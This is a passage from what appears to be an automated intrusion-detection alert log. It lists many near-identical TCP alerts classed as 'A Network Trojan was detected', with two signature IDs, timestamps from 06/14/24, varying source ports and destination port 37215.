                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615881
                SID:2829579
                Source Port:56974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032855
                SID:2835222
                Source Port:47536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704960
                SID:2829579
                Source Port:36086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083916
                SID:2829579
                Source Port:55930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324772
                SID:2835222
                Source Port:55676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023635
                SID:2829579
                Source Port:59798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275439
                SID:2829579
                Source Port:44856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150784
                SID:2835222
                Source Port:54000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420009
                SID:2829579
                Source Port:43100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343390
                SID:2829579
                Source Port:39096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151146
                SID:2829579
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724062
                SID:2829579
                Source Port:45780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291743
                SID:2835222
                Source Port:36550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944033
                SID:2835222
                Source Port:48550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760411
                SID:2835222
                Source Port:36686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716765
                SID:2835222
                Source Port:51176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186565
                SID:2835222
                Source Port:55430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336892
                SID:2829579
                Source Port:38030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011703
                SID:2835222
                Source Port:44862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000097
                SID:2829579
                Source Port:42016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716969
                SID:2829579
                Source Port:42344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051770
                SID:2829579
                Source Port:45396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813199
                SID:2835222
                Source Port:44180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229804
                SID:2829579
                Source Port:53152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369245
                SID:2835222
                Source Port:33660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152470
                SID:2829579
                Source Port:57232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724643
                SID:2835222
                Source Port:58520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148764
                SID:2829579
                Source Port:35274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805354
                SID:2835222
                Source Port:45522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010582
                SID:2829579
                Source Port:46672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089724
                SID:2835222
                Source Port:36982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326645
                SID:2829579
                Source Port:49204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074158
                SID:2835222
                Source Port:43358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.883045
                SID:2829579
                Source Port:47934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501788
                SID:2835222
                Source Port:33754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661972
                SID:2835222
                Source Port:46970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725233
                SID:2835222
                Source Port:50782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544979
                SID:2835222
                Source Port:36536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505106
                SID:2835222
                Source Port:51992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160806
                SID:2835222
                Source Port:44364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183199
                SID:2835222
                Source Port:38894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411492
                SID:2829579
                Source Port:37348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549117
                SID:2835222
                Source Port:40784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012181
                SID:2829579
                Source Port:34194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084253
                SID:2829579
                Source Port:40298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134118
                SID:2835222
                Source Port:34184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677859
                SID:2829579
                Source Port:50294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969051
                SID:2829579
                Source Port:49530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.009379
                SID:2835222
                Source Port:51640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146097
                SID:2835222
                Source Port:55214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.935138
                SID:2835222
                Source Port:59600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969202
                SID:2835222
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618815
                SID:2829579
                Source Port:49400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073715
                SID:2835222
                Source Port:33918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201844
                SID:2829579
                Source Port:52720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177374
                SID:2835222
                Source Port:42654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202777
                SID:2829579
                Source Port:49116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421406
                SID:2835222
                Source Port:45440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899047
                SID:2829579
                Source Port:47896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847670
                SID:2835222
                Source Port:49530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517901
                SID:2835222
                Source Port:33274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990751
                SID:2829579
                Source Port:56846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322377
                SID:2835222
                Source Port:46522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860808
                SID:2829579
                Source Port:59988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276908
                SID:2835222
                Source Port:46104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660266
                SID:2829579
                Source Port:42152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859300
                SID:2829579
                Source Port:51840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668343
                SID:2829579
                Source Port:51550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943252
                SID:2835222
                Source Port:38940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779099
                SID:2835222
                Source Port:42726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846621
                SID:2829579
                Source Port:45734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969111
                SID:2835222
                Source Port:58336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916849
                SID:2829579
                Source Port:58854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702744
                SID:2835222
                Source Port:54088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029872
                SID:2829579
                Source Port:60110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717280
                SID:2829579
                Source Port:51520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764952
                SID:2829579
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827874
                SID:2829579
                Source Port:35048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.714880
                SID:2829579
                Source Port:38674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186362
                SID:2829579
                Source Port:56104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684091
                SID:2835222
                Source Port:33472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567207
                SID:2835222
                Source Port:38746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543765
                SID:2829579
                Source Port:45874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274787
                SID:2829579
                Source Port:38666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718533
                SID:2829579
                Source Port:47636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202275
                SID:2829579
                Source Port:48734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671873
                SID:2829579
                Source Port:39140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505365
                SID:2835222
                Source Port:55804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366412
                SID:2835222
                Source Port:41454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021180
                SID:2835222
                Source Port:39228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185013
                SID:2829579
                Source Port:44688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291179
                SID:2835222
                Source Port:45122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001335
                SID:2829579
                Source Port:33294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647141
                SID:2829579
                Source Port:35248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411782
                SID:2835222
                Source Port:39538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200268
                SID:2829579
                Source Port:36024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024975
                SID:2835222
                Source Port:33190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150126
                SID:2829579
                Source Port:33024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000588
                SID:2829579
                Source Port:38654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411554
                SID:2829579
                Source Port:44740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082407
                SID:2829579
                Source Port:56576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229183
                SID:2835222
                Source Port:56916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181126
                SID:2835222
                Source Port:48230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861092
                SID:2835222
                Source Port:54506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519405
                SID:2829579
                Source Port:58322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671207
                SID:2829579
                Source Port:60668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967641
                SID:2829579
                Source Port:33090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053463
                SID:2835222
                Source Port:51128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733432
                SID:2829579
                Source Port:60726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789157
                SID:2829579
                Source Port:59432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762380
                SID:2835222
                Source Port:48382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684669
                SID:2835222
                Source Port:33448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183300
                SID:2829579
                Source Port:35840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073936
                SID:2829579
                Source Port:55604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682833
                SID:2835222
                Source Port:40936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.909425
                SID:2835222
                Source Port:37230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668969
                SID:2835222
                Source Port:60738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548364
                SID:2829579
                Source Port:53192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778156
                SID:2835222
                Source Port:44570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420710
                SID:2835222
                Source Port:39166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681549
                SID:2835222
                Source Port:36054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013072
                SID:2829579
                Source Port:57860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733039
                SID:2829579
                Source Port:47452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942063
                SID:2829579
                Source Port:59712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.566409
                SID:2829579
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646257
                SID:2835222
                Source Port:44372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934197
                SID:2835222
                Source Port:55658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670122
                SID:2829579
                Source Port:38356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451785
                SID:2835222
                Source Port:43552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198483
                SID:2835222
                Source Port:34336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198697
                SID:2835222
                Source Port:38822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880306
                SID:2835222
                Source Port:56446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704765
                SID:2829579
                Source Port:42692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365850
                SID:2829579
                Source Port:44818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688316
                SID:2829579
                Source Port:60230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727217
                SID:2835222
                Source Port:43788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275405
                SID:2835222
                Source Port:54340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277757
                SID:2829579
                Source Port:47872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669949
                SID:2829579
                Source Port:41700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677590
                SID:2829579
                Source Port:56988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858128
                SID:2829579
                Source Port:48658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472393
                SID:2835222
                Source Port:55716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662565
                SID:2829579
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053276
                SID:2829579
                Source Port:43230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679627
                SID:2829579
                Source Port:43048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966535
                SID:2829579
                Source Port:57916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967569
                SID:2835222
                Source Port:34010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450142
                SID:2835222
                Source Port:53934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809498
                SID:2835222
                Source Port:41426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182486
                SID:2829579
                Source Port:60020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382668
                SID:2829579
                Source Port:34070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645993
                SID:2829579
                Source Port:53696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549054
                SID:2835222
                Source Port:49256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014690
                SID:2835222
                Source Port:33174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858099
                SID:2829579
                Source Port:46092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424841
                SID:2835222
                Source Port:57218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878204
                SID:2835222
                Source Port:53780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051920
                SID:2835222
                Source Port:48362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420093
                SID:2835222
                Source Port:57024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701233
                SID:2835222
                Source Port:46816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772517
                SID:2829579
                Source Port:44374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.093021
                SID:2829579
                Source Port:56210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405726
                SID:2829579
                Source Port:59492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812449
                SID:2829579
                Source Port:50158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200127
                SID:2829579
                Source Port:39536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339346
                SID:2835222
                Source Port:55618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760119
                SID:2829579
                Source Port:58030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759524
                SID:2835222
                Source Port:34846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972128
                SID:2829579
                Source Port:43592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073245
                SID:2829579
                Source Port:52460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451276
                SID:2835222
                Source Port:47832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827754
                SID:2835222
                Source Port:38866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517513
                SID:2829579
                Source Port:34846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737826
                SID:2835222
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965913
                SID:2835222
                Source Port:42958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549015
                SID:2829579
                Source Port:59898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135247
                SID:2829579
                Source Port:38744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543899
                SID:2835222
                Source Port:57372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971652
                SID:2835222
                Source Port:44160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071285
                SID:2829579
                Source Port:44126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115119
                SID:2829579
                Source Port:46858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056326
                SID:2829579
                Source Port:59306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546860
                SID:2829579
                Source Port:54500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250434
                SID:2835222
                Source Port:54196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185262
                SID:2835222
                Source Port:57724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879394
                SID:2829579
                Source Port:55190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848698
                SID:2829579
                Source Port:37958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761638
                SID:2829579
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018597
                SID:2829579
                Source Port:59676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701201
                SID:2829579
                Source Port:52554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906000
                SID:2835222
                Source Port:33746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827573
                SID:2835222
                Source Port:51798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878831
                SID:2829579
                Source Port:41666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517576
                SID:2835222
                Source Port:38614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662476
                SID:2835222
                Source Port:37946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906105
                SID:2829579
                Source Port:46156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679124
                SID:2835222
                Source Port:59312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
